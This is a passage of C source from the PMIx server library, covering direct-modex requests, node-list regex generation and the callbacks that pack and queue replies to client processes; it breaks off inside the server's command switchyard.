* data is recvd */
dcd = PMIX_NEW(pmix_dmdx_remote_t);
PMIX_RETAIN(cd);
dcd->cd = cd;
pmix_list_append(&pmix_server_globals.remote_pnd, &dcd->super);
cd->active = false; // ensure the request doesn't hang
return;
}
/* collect the remote/global data from this proc */
PMIX_CONSTRUCT(&pbkt, pmix_buffer_t);
/* get any remote contribution - note that there
* may not be a contribution */
if (PMIX_SUCCESS == (rc = pmix_hash_fetch(&nptr->server->myremote, info->rank, "modex", &val)) &&
NULL != val) {
data = val->data.bo.bytes;
sz = val->data.bo.size;
/* protect the data */
val->data.bo.bytes = NULL;
val->data.bo.size = 0;
PMIX_VALUE_RELEASE(val);
}
/* execute the callback */
cd->cbfunc(rc, data, sz, cd->cbdata);
if (NULL != data) {
free(data);
}
cd->active = false;
}
PMIX_EXPORT pmix_status_t PMIx_server_dmodex_request(const pmix_proc_t *proc,
pmix_dmodex_response_fn_t cbfunc,
void *cbdata)
{
pmix_setup_caddy_t *cd;
/* protect against bozo */
if (NULL == cbfunc || NULL == proc) {
return PMIX_ERR_BAD_PARAM;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server register client %s:%d",
proc->nspace, proc->rank);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, proc->nspace, PMIX_MAX_NSLEN);
cd->proc.rank = proc->rank;
cd->cbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _dmodex_req);
PMIX_WAIT_FOR_COMPLETION(cd->active);
PMIX_RELEASE(cd);
return PMIX_SUCCESS;
}
static void _store_internal(int sd, short args, void *cbdata)
{
pmix_shift_caddy_t *cd = (pmix_shift_caddy_t*)cbdata;
pmix_nspace_t *ns, *nsptr;
ns = NULL;
PMIX_LIST_FOREACH(nsptr, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strncmp(cd->nspace, nsptr->nspace, PMIX_MAX_NSLEN)) {
ns = nsptr;
break;
}
}
if (NULL == ns) {
/* shouldn't be possible */
cd->status = PMIX_ERR_NOT_FOUND;
} else {
cd->status = pmix_hash_store(&ns->internal, cd->rank, cd->kv);
}
cd->active = false;
}
PMIX_EXPORT pmix_status_t PMIx_Store_internal(const pmix_proc_t *proc,
const char *key, pmix_value_t *val)
{
pmix_shift_caddy_t *cd;
pmix_status_t rc;
/* setup to thread shift this request */
cd = PMIX_NEW(pmix_shift_caddy_t);
cd->nspace = proc->nspace;
cd->rank = proc->rank;
cd->kv = PMIX_NEW(pmix_kval_t);
cd->kv->key = strdup((char*)key);
cd->kv->value = (pmix_value_t*)malloc(sizeof(pmix_value_t));
rc = pmix_value_xfer(cd->kv->value, val);
if (PMIX_SUCCESS != rc) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(cd);
return rc;
}
if (pmix_globals.server) {
PMIX_THREADSHIFT(cd, _store_internal);
PMIX_WAIT_FOR_COMPLETION(cd->active);
} else {
_store_internal(0, 0, cd);
}
rc = cd->status;
PMIX_RELEASE(cd);
return rc;
}
#define PMIX_MAX_NODE_PREFIX 50
PMIX_EXPORT pmix_status_t PMIx_generate_regex(const char *input, char **regexp)
{
char *vptr, *vsave;
char prefix[PMIX_MAX_NODE_PREFIX];
int i, j, len, startnum, vnum, numdigits;
bool found, fullval;
char *suffix, *sfx;
pmix_regex_value_t *vreg;
pmix_regex_range_t *range;
pmix_list_t vids;
char **regexargs = NULL, *tmp, *tmp2;
char *cptr;
/* define the default */
*regexp = NULL;
/* setup the list of results */
PMIX_CONSTRUCT(&vids, pmix_list_t);
/* cycle thru the array of input values - first copy
* it so we don't overwrite what we were given*/
vsave = strdup(input);
vptr = vsave;
while (NULL != (cptr = strchr(vptr, ',')) || 0 < strlen(vptr)) {
if (NULL != cptr) {
*cptr = '\0';
}
/* determine this node's prefix by looking for first non-alpha char */
fullval = false;
len = strlen(vptr);
startnum = -1;
memset(prefix, 0, PMIX_MAX_NODE_PREFIX);
numdigits = 0;
for (i=0, j=0; i < len; i++) {
if (!isalpha(vptr[i])) {
/* found a non-alpha char */
if (!isdigit(vptr[i])) {
/* if it is anything but a digit, we just use
* the entire name
*/
fullval = true;
break;
}
/* count the size of the numeric field - but don't
* add the digits to the prefix
*/
numdigits++;
if (startnum < 0) {
/* okay, this defines end of the prefix */
startnum = i;
}
continue;
}
if (startnum < 0) {
prefix[j++] = vptr[i];
}
}
if (fullval || startnum < 0) {
/* can't compress this name - just add it to the list */
vreg = PMIX_NEW(pmix_regex_value_t);
vreg->prefix = strdup(vptr);
pmix_list_append(&vids, &vreg->super);
/* move to the next posn */
if (NULL == cptr) {
break;
}
vptr = cptr + 1;
continue;
}
/* convert the digits and get any suffix */
vnum = strtol(&vptr[startnum], &sfx, 10);
if (NULL != sfx) {
suffix = strdup(sfx);
} else {
suffix = NULL;
}
/* is this value already on our list? */
found = false;
PMIX_LIST_FOREACH(vreg, &vids, pmix_regex_value_t) {
if (0 < strlen(prefix) && NULL == vreg->prefix) {
continue;
}
if (0 == strlen(prefix) && NULL != vreg->prefix) {
continue;
}
if (0 < strlen(prefix) && NULL != vreg->prefix
&& 0 != strcmp(prefix, vreg->prefix)) {
continue;
}
if (NULL == suffix && NULL != vreg->suffix) {
continue;
}
if (NULL != suffix && NULL == vreg->suffix) {
continue;
}
if (NULL != suffix && NULL != vreg->suffix &&
0 != strcmp(suffix, vreg->suffix)) {
continue;
}
if (numdigits != vreg->num_digits) {
continue;
}
/* found a match - flag it */
found = true;
/* get the last range on this nodeid - we do this
* to preserve order
*/
range = (pmix_regex_range_t*)pmix_list_get_last(&vreg->ranges);
if (NULL == range) {
/* first range for this value */
range = PMIX_NEW(pmix_regex_range_t);
range->start = vnum;
range->cnt = 1;
pmix_list_append(&vreg->ranges, &range->super);
break;
}
/* see if the value is out of sequence */
if (vnum != (range->start + range->cnt)) {
/* start a new range */
range = PMIX_NEW(pmix_regex_range_t);
range->start = vnum;
range->cnt = 1;
pmix_list_append(&vreg->ranges, &range->super);
break;
}
/* everything matches - just increment the cnt */
range->cnt++;
break;
}
if (!found) {
/* need to add it */
vreg = PMIX_NEW(pmix_regex_value_t);
if (0 < strlen(prefix)) {
vreg->prefix = strdup(prefix);
}
if (NULL != suffix) {
vreg->suffix = strdup(suffix);
}
vreg->num_digits = numdigits;
pmix_list_append(&vids, &vreg->super);
/* record the first range for this value - we took
* care of values we can't compress above
*/
range = PMIX_NEW(pmix_regex_range_t);
range->start = vnum;
range->cnt = 1;
pmix_list_append(&vreg->ranges, &range->super);
}
if (NULL != suffix) {
free(suffix);
}
/* move to the next posn */
if (NULL == cptr) {
break;
}
vptr = cptr + 1;
}
free(vsave);
/* begin constructing the regular expression */
while (NULL != (vreg = (pmix_regex_value_t*)pmix_list_remove_first(&vids))) {
/* if no ranges, then just add the name */
if (0 == pmix_list_get_size(&vreg->ranges)) {
if (NULL != vreg->prefix) {
/* solitary value */
if (0 > asprintf(&tmp, "%s", vreg->prefix)) {
return PMIX_ERR_NOMEM;
}
pmix_argv_append_nosize(®exargs, tmp);
free(tmp);
}
PMIX_RELEASE(vreg);
continue;
}
/* start the regex for this value with the prefix */
if (NULL != vreg->prefix) {
if (0 > asprintf(&tmp, "%s[%d:", vreg->prefix, vreg->num_digits)) {
return PMIX_ERR_NOMEM;
}
} else {
if (0 > asprintf(&tmp, "[%d:", vreg->num_digits)) {
return PMIX_ERR_NOMEM;
}
}
/* add the ranges */
while (NULL != (range = (pmix_regex_range_t*)pmix_list_remove_first(&vreg->ranges))) {
if (1 == range->cnt) {
if (0 > asprintf(&tmp2, "%s%d,", tmp, range->start)) {
return PMIX_ERR_NOMEM;
}
} else {
if (0 > asprintf(&tmp2, "%s%d-%d,", tmp, range->start, range->start + range->cnt - 1)) {
return PMIX_ERR_NOMEM;
}
}
free(tmp);
tmp = tmp2;
PMIX_RELEASE(range);
}
/* replace the final comma */
tmp[strlen(tmp)-1] = ']';
if (NULL != vreg->suffix) {
/* add in the suffix, if provided */
if (0 > asprintf(&tmp2, "%s%s", tmp, vreg->suffix)) {
return PMIX_ERR_NOMEM;
}
free(tmp);
tmp = tmp2;
}
pmix_argv_append_nosize(®exargs, tmp);
free(tmp);
PMIX_RELEASE(vreg);
}
/* assemble final result */
tmp = pmix_argv_join(regexargs, ',');
if (0 > asprintf(regexp, "pmix[%s]", tmp)) {
return PMIX_ERR_NOMEM;
}
free(tmp);
/* cleanup */
pmix_argv_free(regexargs);
PMIX_DESTRUCT(&vids);
return PMIX_SUCCESS;
}
PMIX_EXPORT pmix_status_t PMIx_generate_ppn(const char *input, char **regexp)
{
char **ppn, **npn;
int i, j, start, end;
pmix_regex_value_t *vreg;
pmix_regex_range_t *rng;
pmix_list_t nodes;
char *tmp, *tmp2;
char *cptr;
/* define the default */
*regexp = NULL;
/* setup the list of results */
PMIX_CONSTRUCT(&nodes, pmix_list_t);
/* split the input by node */
ppn = pmix_argv_split(input, ';');
/* for each node, split the input by comma */
for (i=0; NULL != ppn[i]; i++) {
rng = NULL;
/* create a record for this node */
vreg = PMIX_NEW(pmix_regex_value_t);
pmix_list_append(&nodes, &vreg->super);
/* split the input for this node */
npn = pmix_argv_split(ppn[i], ',');
/* look at each element */
for (j=0; NULL != npn[j]; j++) {
/* is this a range? */
if (NULL != (cptr = strchr(npn[j], '-'))) {
/* terminate the string */
*cptr = '\0';
++cptr;
start = strtol(npn[j], NULL, 10);
end = strtol(cptr, NULL, 10);
/* are we collecting a range? */
if (NULL == rng) {
/* no - better start one */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = end - start + 1;
pmix_list_append(&vreg->ranges, &rng->super);
} else {
/* is this a continuation of the current range? */
if (start == (rng->start + rng->cnt)) {
/* just add it to the end of this range */
rng->cnt++;
} else {
/* nope, there is a break - create new range */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = end - start + 1;
pmix_list_append(&vreg->ranges, &rng->super);
}
}
} else {
/* single rank given */
start = strtol(npn[j], NULL, 10);
/* are we collecting a range? */
if (NULL == rng) {
/* no - better start one */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = 1;
pmix_list_append(&vreg->ranges, &rng->super);
} else {
/* is this a continuation of the current range? */
if (start == (rng->start + rng->cnt)) {
/* just add it to the end of this range */
rng->cnt++;
} else {
/* nope, there is a break - create new range */
rng = PMIX_NEW(pmix_regex_range_t);
rng->start = start;
rng->cnt = 1;
pmix_list_append(&vreg->ranges, &rng->super);
}
}
}
}
pmix_argv_free(npn);
}
pmix_argv_free(ppn);
/* begin constructing the regular expression */
tmp = strdup("pmix[");
PMIX_LIST_FOREACH(vreg, &nodes, pmix_regex_value_t) {
while (NULL != (rng = (pmix_regex_range_t*)pmix_list_remove_first(&vreg->ranges))) {
if (1 == rng->cnt) {
if (0 > asprintf(&tmp2, "%s%d,", tmp, rng->start)) {
return PMIX_ERR_NOMEM;
}
} else {
if (0 > asprintf(&tmp2, "%s%d-%d,", tmp, rng->start, rng->start + rng->cnt - 1)) {
return PMIX_ERR_NOMEM;
}
}
free(tmp);
tmp = tmp2;
PMIX_RELEASE(rng);
}
/* replace the final comma */
tmp[strlen(tmp)-1] = ';';
}
/* replace the final semi-colon */
tmp[strlen(tmp)-1] = ']';
/* assemble final result */
*regexp = tmp;
PMIX_LIST_DESTRUCT(&nodes);
return PMIX_SUCCESS;
}
/**** THE FOLLOWING CALLBACK FUNCTIONS ARE USED BY THE HOST SERVER ****
**** THEY THEREFORE CAN OCCUR IN EITHER THE HOST SERVER'S THREAD ****
**** CONTEXT, OR IN OUR OWN THREAD CONTEXT IF THE CALLBACK OCCURS ****
**** IMMEDIATELY. THUS ANYTHING THAT ACCESSES A GLOBAL ENTITY ****
**** MUST BE PUSHED INTO AN EVENT FOR PROTECTION ****/
static void op_cbfunc(pmix_status_t status, void *cbdata)
{
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)cbdata;
pmix_buffer_t *reply;
pmix_status_t rc;
/* no need to thread-shift here as no global data is
* being accessed */
/* setup the reply with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
/* the function that created the server_caddy did a
* retain on the peer, so we don't have to worry about
* it still being present - send a copy to the originator */
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
/* cleanup */
PMIX_RELEASE(cd);
}
static void _spcb(int sd, short args, void *cbdata)
{
pmix_shift_caddy_t *cd = (pmix_shift_caddy_t*)cbdata;
pmix_nspace_t *nptr, *ns;
pmix_buffer_t *reply;
pmix_status_t rc;
/* setup the reply with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &cd->status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(cd->cd);
cd->active = false;
return;
}
if (PMIX_SUCCESS == cd->status) {
/* add any job-related info we have on that nspace - this will
* include the name of the nspace */
nptr = NULL;
PMIX_LIST_FOREACH(ns, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(ns->nspace, cd->nspace)) {
nptr = ns;
break;
}
}
if (NULL == nptr) {
/* shouldn't happen */
PMIX_ERROR_LOG(PMIX_ERR_NOT_FOUND);
} else {
pmix_bfrop.copy_payload(reply, &nptr->server->job_info);
}
}
/* the function that created the server_caddy did a
* retain on the peer, so we don't have to worry about
* it still being present - tell the originator the result */
PMIX_SERVER_QUEUE_REPLY(cd->cd->peer, cd->cd->hdr.tag, reply);
/* cleanup */
PMIX_RELEASE(cd->cd);
cd->active = false;
}
static void spawn_cbfunc(pmix_status_t status, char *nspace, void *cbdata)
{
pmix_shift_caddy_t *cd;
/* need to thread-shift this request */
cd = PMIX_NEW(pmix_shift_caddy_t);
cd->status = status;
cd->nspace = nspace;
cd->cd = (pmix_server_caddy_t*)cbdata;;
PMIX_THREADSHIFT(cd, _spcb);
PMIX_WAIT_FOR_COMPLETION(cd->active);
PMIX_RELEASE(cd);
}
static void lookup_cbfunc(pmix_status_t status, pmix_pdata_t pdata[], size_t ndata,
void *cbdata)
{
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)cbdata;
pmix_buffer_t *reply;
pmix_status_t rc;
/* no need to thread-shift as no global data is accessed */
/* setup the reply with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
if (PMIX_SUCCESS == status) {
/* pack the returned data objects */
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &ndata, 1, PMIX_SIZE))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, pdata, ndata, PMIX_PDATA))) {
PMIX_ERROR_LOG(rc);
PMIX_RELEASE(reply);
return;
}
}
/* the function that created the server_caddy did a
* retain on the peer, so we don't have to worry about
* it still being present - tell the originator the result */
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
/* cleanup */
PMIX_RELEASE(cd);
}
static void _mdxcbfunc(int sd, short argc, void *cbdata)
{
pmix_shift_caddy_t *scd = (pmix_shift_caddy_t*)cbdata;
pmix_server_trkr_t *tracker = scd->tracker;
pmix_buffer_t xfer, *bptr, *databuf, *bpscope, *reply;
pmix_nspace_t *nptr, *ns;
pmix_server_caddy_t *cd;
char *nspace;
int rank;
pmix_status_t rc = PMIX_SUCCESS;
int32_t cnt = 1;
char byte;
/* pass the blobs being returned */
PMIX_CONSTRUCT(&xfer, pmix_buffer_t);
if (PMIX_SUCCESS != scd->status) {
rc = scd->status;
goto finish_collective;
}
if (PMIX_COLLECT_INVALID == tracker->collect_type) {
rc = PMIX_ERR_INVALID_ARG;
goto finish_collective;
}
PMIX_LOAD_BUFFER(&xfer, scd->data, scd->ndata);
/* if data was returned, unpack and store it */
while (PMIX_SUCCESS == (rc = pmix_bfrop.unpack(&xfer, &byte, &cnt, PMIX_BYTE))) {
pmix_collect_t ctype = (pmix_collect_t)byte;
// Check that this blob was accumulated with the same data collection setting
if (ctype != tracker->collect_type) {
rc = PMIX_ERR_INVALID_ARG;
goto finish_collective;
}
// Skip the rest of the iteration if there is no data
if (PMIX_COLLECT_YES != tracker->collect_type) {
continue;
}
// Extract the node-wise blob containing rank data
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(&xfer, &databuf, &cnt, PMIX_BUFFER))) {
rc = PMIX_ERR_DATA_VALUE_NOT_FOUND;
goto finish_collective;
}
// Loop over rank blobs
cnt = 1;
while (PMIX_SUCCESS == (rc = pmix_bfrop.unpack(databuf, &bptr, &cnt, PMIX_BUFFER))) {
/* unpack the nspace */
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(bptr, &nspace, &cnt, PMIX_STRING))) {
PMIX_ERROR_LOG(rc);
goto finish_collective;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"server:modex_cbfunc unpacked blob for npsace %s", nspace);
/* find the nspace object */
nptr = NULL;
PMIX_LIST_FOREACH(ns, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(nspace, ns->nspace)) {
nptr = ns;
break;
}
}
if (NULL == nptr) {
/* Shouldn't happen. The Fence is performed among well-known
* set of processes in known namespaces. Consider this as
* unrecoverable fault.
*/
pmix_output_verbose(8, pmix_globals.debug_output,
"modex_cbfunc: unknown nspace %s, Fence ", nspace);
/*
* TODO: if some namespaces are OK and the bad one is not the first
* the server is in inconsistent state. Should we rely on the client to abort
* computation or this is our task?
*/
rc = PMIX_ERR_INVALID_NAMESPACE;
goto finish_collective;
}
/* unpack the rank */
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(bptr, &rank, &cnt, PMIX_PROC_RANK))) {
PMIX_ERROR_LOG(rc);
goto finish_collective;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"client:unpack fence received blob for rank %d", rank);
/* there may be multiple blobs for this rank, each from a different scope */
cnt = 1;
while (PMIX_SUCCESS == (rc = pmix_bfrop.unpack(bptr, &bpscope, &cnt, PMIX_BUFFER))) {
/* don't store blobs to the sm dstore from local clients */
if (_my_client(nptr->nspace, rank)) {
continue;
}
pmix_kval_t *kp = PMIX_NEW(pmix_kval_t);
kp->key = strdup("modex");
PMIX_VALUE_CREATE(kp->value, 1);
kp->value->type = PMIX_BYTE_OBJECT;
PMIX_UNLOAD_BUFFER(bpscope, kp->value->data.bo.bytes, kp->value->data.bo.size);
/* store it in the appropriate hash */
if (PMIX_SUCCESS != (rc = pmix_hash_store(&nptr->server->remote, rank, kp))) {
PMIX_ERROR_LOG(rc);
}
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
if (PMIX_SUCCESS != (rc = pmix_dstore_store(nptr->nspace, rank, kp))) {
PMIX_ERROR_LOG(rc);
}
#endif /* PMIX_ENABLE_DSTORE */
PMIX_RELEASE(kp); // maintain acctg
} // while bpscope
if (PMIX_ERR_UNPACK_READ_PAST_END_OF_BUFFER != rc) {
PMIX_ERROR_LOG(rc);
/*
* TODO: if some buffers are OK and the bad one is not the first
* the server is in inconsistent state. Should we rely on the client to abort
* computation or this is our task?
*/
goto finish_collective;
}
PMIX_RELEASE(bpscope);
PMIX_RELEASE(bptr);
cnt = 1;
}
if (PMIX_ERR_UNPACK_READ_PAST_END_OF_BUFFER != rc) {
goto finish_collective;
} else {
rc = PMIX_SUCCESS;
}
cnt = 1;
} // while bptr
if (PMIX_ERR_UNPACK_READ_PAST_END_OF_BUFFER == rc) {
rc = PMIX_SUCCESS;
}
finish_collective:
/* setup the reply, starting with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &rc, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto cleanup;
}
/* loop across all procs in the tracker, sending them the reply */
PMIX_LIST_FOREACH(cd, &tracker->local_cbs, pmix_server_caddy_t) {
PMIX_RETAIN(reply);
pmix_output_verbose(2, pmix_globals.debug_output,
"server:modex_cbfunc reply being sent to %s:%d",
cd->peer->info->nptr->nspace, cd->peer->info->rank);
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
}
cleanup:
/* Protect data from being free'd because RM pass
* the pointer that is set to the middle of some
* buffer (the case with SLURM).
* RM is responsible on the release of the buffer
*/
xfer.base_ptr = NULL;
xfer.bytes_used = 0;
PMIX_DESTRUCT(&xfer);
PMIX_RELEASE(reply); // maintain accounting
pmix_list_remove_item(&pmix_server_globals.collectives, &tracker->super);
PMIX_RELEASE(tracker);
/* we are done */
if (NULL != scd->cbfunc.relfn) {
scd->cbfunc.relfn(scd->cbdata);
}
PMIX_RELEASE(scd);
}
static void modex_cbfunc(pmix_status_t status, const char *data, size_t ndata, void *cbdata,
pmix_release_cbfunc_t relfn, void *relcbd)
{
pmix_server_trkr_t *tracker = (pmix_server_trkr_t*)cbdata;
pmix_shift_caddy_t *scd;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:modex_cbfunc called with %d bytes", (int)ndata);
if (NULL == tracker) {
/* nothing to do - but be sure to give them
* a release if they want it */
if (NULL != relfn) {
relfn(relcbd);
}
return;
}
/* need to thread-shift this callback as it accesses global data */
scd = PMIX_NEW(pmix_shift_caddy_t);
scd->status = status;
scd->data = data;
scd->ndata = ndata;
scd->tracker = tracker;
scd->cbfunc.relfn = relfn;
scd->cbdata = relcbd;
PMIX_THREADSHIFT(scd, _mdxcbfunc);
}
static void get_cbfunc(pmix_status_t status, const char *data, size_t ndata, void *cbdata,
pmix_release_cbfunc_t relfn, void *relcbd)
{
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)cbdata;
pmix_buffer_t *reply, buf;
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:get_cbfunc called with %d elements", (int)ndata);
/* no need to thread-shift here as no global data is accessed */
if (NULL == cd) {
/* nothing to do - but be sure to give them
* a release if they want it */
if (NULL != relfn) {
relfn(relcbd);
}
return;
}
/* setup the reply, starting with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto cleanup;
}
/* pack the blob being returned */
PMIX_CONSTRUCT(&buf, pmix_buffer_t);
PMIX_LOAD_BUFFER(&buf, data, ndata);
pmix_bfrop.copy_payload(reply, &buf);
buf.base_ptr = NULL;
buf.bytes_used = 0;
PMIX_DESTRUCT(&buf);
/* send the data to the requestor */
pmix_output_verbose(2, pmix_globals.debug_output,
"server:get_cbfunc reply being sent to %s:%d",
cd->peer->info->nptr->nspace, cd->peer->info->rank);
pmix_output_hexdump(5, pmix_globals.debug_output,
reply->base_ptr, (reply->bytes_used < 256 ? reply->bytes_used : 256));
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
cleanup:
/* if someone wants a release, give it to them */
if (NULL != relfn) {
relfn(relcbd);
}
PMIX_RELEASE(cd);
}
static void _cnct(int sd, short args, void *cbdata)
{
pmix_shift_caddy_t *scd = (pmix_shift_caddy_t*)cbdata;
pmix_server_trkr_t *tracker = scd->tracker;
pmix_buffer_t *reply;
pmix_status_t rc;
int i;
pmix_server_caddy_t *cd;
char **nspaces=NULL;
pmix_nspace_t *nptr;
pmix_buffer_t *job_info_ptr;
/* setup the reply, starting with the returned status */
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &scd->status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto cleanup;
}
if (PMIX_CONNECTNB_CMD == tracker->type) {
/* find the unique nspaces that are participating */
PMIX_LIST_FOREACH(cd, &tracker->local_cbs, pmix_server_caddy_t) {
pmix_argv_append_unique_nosize(&nspaces, cd->peer->info->nptr->nspace, false);
}
/* loop across all participating nspaces and include their
* job-related info */
for (i=0; NULL != nspaces[i]; i++) {
PMIX_LIST_FOREACH(nptr, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 != strcmp(nspaces[i], nptr->nspace)) {
continue;
}
job_info_ptr = &nptr->server->job_info;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &job_info_ptr, 1, PMIX_BUFFER))) {
PMIX_ERROR_LOG(rc);
pmix_argv_free(nspaces);
goto cleanup;
}
}
}
pmix_argv_free(nspaces);
}
/* loop across all procs in the tracker, sending them the reply */
PMIX_LIST_FOREACH(cd, &tracker->local_cbs, pmix_server_caddy_t) {
PMIX_RETAIN(reply);
pmix_output_verbose(2, pmix_globals.debug_output,
"server:cnct_cbfunc reply being sent to %s:%d",
cd->peer->info->nptr->nspace, cd->peer->info->rank);
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
}
cleanup:
PMIX_RELEASE(reply); // maintain accounting
pmix_list_remove_item(&pmix_server_globals.collectives, &tracker->super);
PMIX_RELEASE(tracker);
/* we are done */
PMIX_RELEASE(scd);
}
static void cnct_cbfunc(pmix_status_t status, void *cbdata)
{
pmix_server_trkr_t *tracker = (pmix_server_trkr_t*)cbdata;
pmix_shift_caddy_t *scd;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:cnct_cbfunc called");
if (NULL == tracker) {
/* nothing to do */
return;
}
/* need to thread-shift this callback as it accesses global data */
scd = PMIX_NEW(pmix_shift_caddy_t);
scd->status = status;
scd->tracker = tracker;
PMIX_THREADSHIFT(scd, _cnct);
}
static void regevents_cbfunc(pmix_status_t status, void *cbdata)
{
pmix_status_t rc;
pmix_server_caddy_t *cd = (pmix_server_caddy_t*) cbdata;
pmix_buffer_t *reply;
pmix_output_verbose(2, pmix_globals.debug_output,
"server:regevents_cbfunc called status = %d", status);
reply = PMIX_NEW(pmix_buffer_t);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
}
// send reply
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
PMIX_RELEASE(cd);
}
static void notifyerror_cbfunc (pmix_status_t status, void *cbdata)
{
pmix_status_t rc;
pmix_server_caddy_t *cd = (pmix_server_caddy_t*) cbdata;
pmix_buffer_t *reply = PMIX_NEW(pmix_buffer_t);
pmix_output_verbose(2, pmix_globals.debug_output,
"server:notifyerror_cbfunc called status = %d", status);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
}
// send reply
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
PMIX_RELEASE(cd);
}
static void query_cbfunc(pmix_status_t status,
pmix_info_t *info, size_t ninfo,
void *cbdata,
pmix_release_cbfunc_t release_fn,
void *release_cbdata)
{
pmix_query_caddy_t *qcd = (pmix_query_caddy_t*)cbdata;
pmix_server_caddy_t *cd = (pmix_server_caddy_t*)qcd->cbdata;
pmix_buffer_t *reply = PMIX_NEW(pmix_buffer_t);
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:query callback with status %d", status);
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &status, 1, PMIX_STATUS))) {
PMIX_ERROR_LOG(rc);
goto complete;
}
/* pack the returned data */
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, &ninfo, 1, PMIX_SIZE))) {
PMIX_ERROR_LOG(rc);
goto complete;
}
if (0 < ninfo) {
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(reply, info, ninfo, PMIX_INFO))) {
PMIX_ERROR_LOG(rc);
}
}
complete:
// send reply
PMIX_SERVER_QUEUE_REPLY(cd->peer, cd->hdr.tag, reply);
// cleanup
PMIX_QUERY_FREE(qcd->queries, qcd->nqueries);
PMIX_RELEASE(qcd);
PMIX_RELEASE(cd);
}
/* the switchyard is the primary message handling function. It's purpose
* is to take incoming commands (packed into a buffer), unpack them,
* and then call the corresponding host server's function to execute
* them. Some commands involve only a single proc (i.e., the one
* sending the command) and can be executed while we wait. In these cases,
* the switchyard will construct and pack a reply buffer to be returned
* to the sender.
*
* Other cases (either multi-process collective or cmds that require
* an async reply) cannot generate an immediate reply. In these cases,
* the reply buffer will be NULL. An appropriate callback function will
* be called that will be responsible for eventually replying to the
* calling processes.
*
* Should an error be encountered at any time within the switchyard, an
* error reply buffer will be returned so that the caller can be notified,
* thereby preventing the process from hanging. */
static pmix_status_t server_switchyard(pmix_peer_t *peer, uint32_t tag,
pmix_buffer_t *buf)
{
pmix_status_t rc=PMIX_ERR_NOT_SUPPORTED;
int32_t cnt;
pmix_cmd_t cmd;
pmix_server_caddy_t *cd;
pmix_proc_t proc;
pmix_buffer_t *reply;
pmix_regevents_info_t *reginfo;
pmix_peer_events_info_t *prev;
/* retrieve the cmd */
cnt = 1;
if (PMIX_SUCCESS != (rc = pmix_bfrop.unpack(buf, &cmd, &cnt, PMIX_CMD))) {
PMIX_ERROR_LOG(rc);
return rc;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"recvd pmix cmd %d from %s:%d",
cmd, peer->info->nptr->nspace, peer->info->rank);
if (PMIX_REQ_CMD == cmd) {
reply = PMIX_NEW(pmix_buffer_t);
pmix_bfrop.copy_payload(reply, &(peer->info->nptr->server->job_info));
